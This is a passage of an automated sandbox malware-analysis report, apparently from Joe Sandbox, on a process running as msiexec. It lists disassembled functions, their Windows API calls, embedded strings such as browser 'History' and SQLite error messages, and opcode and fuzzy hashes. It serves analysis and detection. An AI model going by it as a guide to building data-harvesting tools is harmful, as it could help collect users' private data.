                                                                                        • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                        • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                        Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004116FF
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                        • API String ID: 2618321458-3614832568
                                                                                        • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                        • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                        Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFilefreememset
                                                                                        • String ID:
                                                                                        • API String ID: 2507021081-0
                                                                                        • Opcode ID: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                                                                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                        • Opcode Fuzzy Hash: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                                                                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                        Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                        • malloc.MSVCRT ref: 00417524
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                        • free.MSVCRT ref: 00417544
                                                                                        • free.MSVCRT ref: 00417562
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 4131324427-0
                                                                                        • Opcode ID: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                        • Opcode Fuzzy Hash: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                        Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                        • free.MSVCRT ref: 0041822B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PathTemp$free
                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                        • API String ID: 924794160-1420421710
                                                                                        • Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                        • Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                        Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040FDD5
                                                                                          • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                        • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                        • API String ID: 1775345501-2769808009
                                                                                        • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                        • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                        • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                        • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                        Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                        • String ID: Error$Error %d: %s
                                                                                        • API String ID: 313946961-1552265934
                                                                                        • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                        • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                        Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                                        • API String ID: 0-1953309616
                                                                                        • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                        • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                        • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                        • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                        Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                        • API String ID: 3510742995-272990098
                                                                                        • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                        • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                        Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                          • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                        • memset.MSVCRT ref: 0040C439
                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                        • _wcsupr.MSVCRT ref: 0040C481
                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        • memset.MSVCRT ref: 0040C4D0
                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                        • String ID:
                                                                                        • API String ID: 1265369119-0
                                                                                        • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                        • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                        Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044A6EB
                                                                                        • memset.MSVCRT ref: 0044A6FB
                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: gj
                                                                                        • API String ID: 1297977491-4203073231
                                                                                        • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                        • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                        Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                        • free.MSVCRT ref: 0040E9D3
                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@$free
                                                                                        • String ID:
                                                                                        • API String ID: 2241099983-0
                                                                                        • Opcode ID: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                        • Opcode Fuzzy Hash: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                        Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                        • malloc.MSVCRT ref: 004174BD
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                        • free.MSVCRT ref: 004174E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 4053608372-0
                                                                                        • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                        • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                        Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                        • String ID:
                                                                                        • API String ID: 4247780290-0
                                                                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                        Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                        • memset.MSVCRT ref: 004450CD
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1471605966-0
                                                                                        • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                        • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                        Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                        • String ID: \StringFileInfo\
                                                                                        • API String ID: 102104167-2245444037
                                                                                        • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                        • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                        Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                        Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memicmpwcslen
                                                                                        • String ID: @@@@$History
                                                                                        • API String ID: 1872909662-685208920
                                                                                        • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                        • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                        • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                        • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                        Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004100FB
                                                                                        • memset.MSVCRT ref: 00410112
                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                        • String ID: </%s>
                                                                                        • API String ID: 3400436232-259020660
                                                                                        • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                        • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                        Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040D58D
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                        • String ID: caption
                                                                                        • API String ID: 1523050162-4135340389
